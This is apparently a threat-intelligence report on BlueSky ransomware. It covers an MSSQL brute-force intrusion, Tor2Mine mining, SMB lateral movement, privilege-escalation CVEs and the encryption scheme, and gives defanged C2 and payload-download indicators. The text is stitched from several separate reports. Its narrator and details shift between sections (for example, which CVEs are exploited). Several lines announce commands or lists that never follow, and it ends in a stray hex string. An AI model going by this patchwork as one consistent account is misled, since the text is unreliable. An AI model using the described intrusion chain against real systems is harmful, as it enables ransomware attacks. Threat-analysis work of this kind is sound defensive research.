Bluesky Ransomware

[Exequiel Mondragon]

InDecember 2022, we observed an intrusion on a public-facing MSSQL Server, which resulted in BlueSky ransomware. First discovered in June 2022, BlueSky ransomware has code links to Conti and Babuk ransomware.

While other reports point to malware downloads as initial access, in this report the threat actors gained access via a MSSQL brute force attack. They then leveraged Cobalt Strike and Tor2Mine to perform post-exploitation activities. Within one hour of the threat actors accessing the network, they deployed BlueSky ransomware network wide.

The PowerShell session was then seen making a connection to a Tor2Mine stager server. This was followed by execution of a PowerShell script which performed a variety of operations, such as checking privileges of the active user, disabling of AV solutions, and dropping of a miner payload named java.exe. Tor2Mine is a Monero-mining campaign that is based on XMRigCC. Depending upon the privileges of the user, the script also performs creation of scheduled tasks and Windows services to maintain persistence on the host.

Around 15 minutes after initial access, the threat actors then moved laterally toward domain controllers and file shares using remote service creation. These services were used to execute the same PowerShell commands, download and execute the Tor2Mine malware. Upon establishing access to one of the domain controllers the threat actors performed similar activity as observed on the beachhead.

After roughly 30 minutes after initial access, the BlueSky ransomware binary was dropped and executed on the beachhead. The execution worked as intended which resulted in the ransomware spreading to all devices in the network over SMB. The time to ransomware in this case was 32 minutes.

The Cobalt Strike server observed in this intrusion was first observed on December 16th 2022 and remained active through January 17th 2023. We saw the server then return for a second time frame from April 6th 2023 though April 15th 2023. This data was provided via the Threat Intel tracking services of The DFIR Report.

We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Sliver, BianLian, Metasploit, Empire, Havoc, etc. More information on this service can be found here.

In the next attack stage, the threat actors established a command shell via Extended SQL Stored Procedure (xp_cmdshell). This process allows you to issue operating system commands directly to the Windows command shell. To do this they enabled the feature the MSSQL configuration:

Tor2Mine uses a PowerShell script checking.ps1 to perform variety of operations. The script first sets a variable named $priv and $osver to check whether the active user is an administrator and the operating system version respectively, in the first few lines.

To establish persistence in the network, multiple scheduled tasks and Windows services were created on the beachhead and one of the domain controllers. They reference the files dropped on the compromised hosts and Tor2Mine servers.

During the intrusion the threat actor deployed XMrig miner which loaded the driver WinRing0. This driver is deployed to assist the miner in operations and has been in use since at least version 5.3.0.

In the script checking.ps1 the threat actor created 16 different tasks on the hosts where Tor2Mine was deployed. These tasks were named in a manner to try and blend in with various Windows tasks that on the hosts:

During the course of the intrusion, we observed port discovery (port 445) activity from the beachhead. We attribute this to the invocation of the PowerShell command Invoke-SMBExec. This was likely executed as part of the Invoke-TheHash framework based on other PowerShell modules observed.

Decoding the command we can see the same PowerShell download and execute as observed on the beachhead. The hexadecimal value 0x53611451 corresponds to the IP address 83.97.20[.]81 which was the command and control server for the Tor2Mine malware.

The BlueSky ransomware binary named vmware.exe was dropped on the beachhead, which upon execution, resulted in network wide ransomware. This was accomplished using SMB with the ransomware connecting to host over port 445 to encrypt files.

BlueSky ransomware is an emerging threat that researchers have been paying increasing attention to since its initial discovery in late June 2022. The ransomware has been observed being spread via trojanized downloads from questionable websites as well as in phishing emails.

Upon infection, BlueSky uses fast encryption techniques to rapidly process files on the target and connected hosts. The ransomware has the ability to move laterally via SMB and has been observed doing so in Active Directory environments. Encrypted files will be marked with the .bluesky extension. Victims are instructed to contact the attackers via a TOR-based portal to obtain a decrypter.

The first stage of a BlueSky ransomware infection involves a compressed, base64-encoded PowerShell script, start.ps1. On execution, the script produces a further PowerShell script, stage.ps1. If stage.ps1 is run without administrator privileges, it first seeks to elevate privileges through CVE-2021-1732 or CVE-2022-21882.

Setting ThreadInformationClass to the value of 0x11 prevents certain events from being viewed or hooked by debuggers, or from being detected by certain EDR hooking mechanisms. As noted by Unit32, BlueSky uses a multithreaded queue for faster encryption.

Previous researchers have noted that file targeting is inverted compared to typical ransomware behavior: rather than targeting specific file extensions, BlueSky instead lists file types to be excluded from encryption. The following extensions are reportedly excluded:

BlueSky ransomware has the ability to rapidly encrypt the local host and move laterally by exploiting known vulnerabilities. BlueSky campaigns appear to be in their infancy, but the architecture of both droppers and payloads indicates that the actors have invested significant effort and will be looking to reap the returns. Now is the time for security teams to get ahead by bolstering their protection and detection posture.

Based on the information available, it seems that BlueSky Ransomware hasn't shared any stolen data with the public yet. Also, the Bitcoin wallets linked to BlueSky Ransomware samples haven't been used for any transactions. This suggests that this threat is still in its infancy.

Although infection rates are currently minimal, the ransomware's characteristics, which are detailed below, suggest it has been meticulously crafted for a sustained operational campaign. In this post, we delve into the latest intelligence regarding BlueSky ransomware to aid security teams in bolstering their defenses against this emerging threat.

Significantly, before dropping the final BlueSky payload, the PowerShell dropper determines if it is being executed as a privileged user. If so, it moves to the next step and downloads and executes the ransomware payload. If not, it uses the following techniques to escalate local privileges, depending on the version of the host operating system. If the version of the host operating system is earlier than Windows 10, such as Windows 7, 8 or XP, then the script will download and execute a modified version of the local privilege escalation tool called JuicyPotato. If the host is running Windows 10 or later, then the script will download and execute ghost.exe and spooler.exe to exploit local privilege escalation vulnerabilities CVE-2020-0796 and CVE-2021-1732, respectively.

Vulnerabilities being exploited to gain privileges are as below.

After gaining additional privileges, PowerShell dropper downloads the final BlueSky ransomware payload from hxxps://kmsauto[.]us/someone/I.exe and saves it locally to the filesystem as javaw.exe, attempting to masquerade as a legitimate Windows application. Eventually, the sample executes from the file path

BlueSky drops the ransom note as a text file named # DECRYPT FILES BLUESKY #.txt and an HTML file named # DECRYPT FILES BLUESKY #.html in a local directory where it has encrypted files successfully and renamed them with the file extension .bluesky. The content of these 2 files is shown below.

File encryption limitations: Unlike other ransomware, which normally contains a list of file extensions to identify eligible files for encryption, BlueSky consists of a list of extensions that are negated in the file encryption process.

BlueSky Ransomware uses a multithreaded queue for the encryption process. It starts multiple threads, one responsible for file encryption, another for enumerating files on the local file system and mounted network shares to be added into the queue. Below is the flow chart for the same.

The file encryption of BlueSky Ransomware is similar to Babuk Ransomware. Where both use Curve25519 to generate a public key for the host and generate a shared key with the public key of the attacker. After generating an elliptic curve key pair, BlueSky computes a hash of the shared key, and uses it to generate a file encryption key for the ChaCha20 algorithm. Finally, it reads the file buffer, encrypts it with ChaCha20 and replaces the contents of the original file.

T1140 - Deobfuscate/Decode Files or Information: BlueSky downloader base64-decodes and decompresses data to unpack the next stage payload. BlueSky ransomware payload encrypts ransom note with rc4-based encryption, and it uses a custom encryption scheme to encrypt embedded strings.

Cyber criminals behind ransomware attacks are continuously adapting to advanced tactics, making it increasingly challenging for cybersecurity defenses to thwart their activities. These evolving techniques encompass encoding and encrypting malicious code, along with the implementation of multi-staged payload delivery methods. Notably, the BlueSky ransomware strain demonstrates exceptional proficiency by swiftly encrypting files on victim machines using multi-threaded processing capabilities. Furthermore, it employs obfuscation strategies, such as API hashing, to impede reverse engineering efforts by security analysts.

3a8082e126